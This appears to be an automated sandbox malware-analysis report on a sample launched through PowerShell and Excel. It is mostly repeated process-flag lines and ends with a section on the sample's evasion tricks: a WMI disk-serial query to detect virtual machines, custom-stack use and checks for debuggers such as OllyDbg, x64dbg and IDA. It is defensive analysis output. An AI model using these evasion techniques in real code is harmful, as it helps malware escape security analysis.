                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 5BBB83A
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
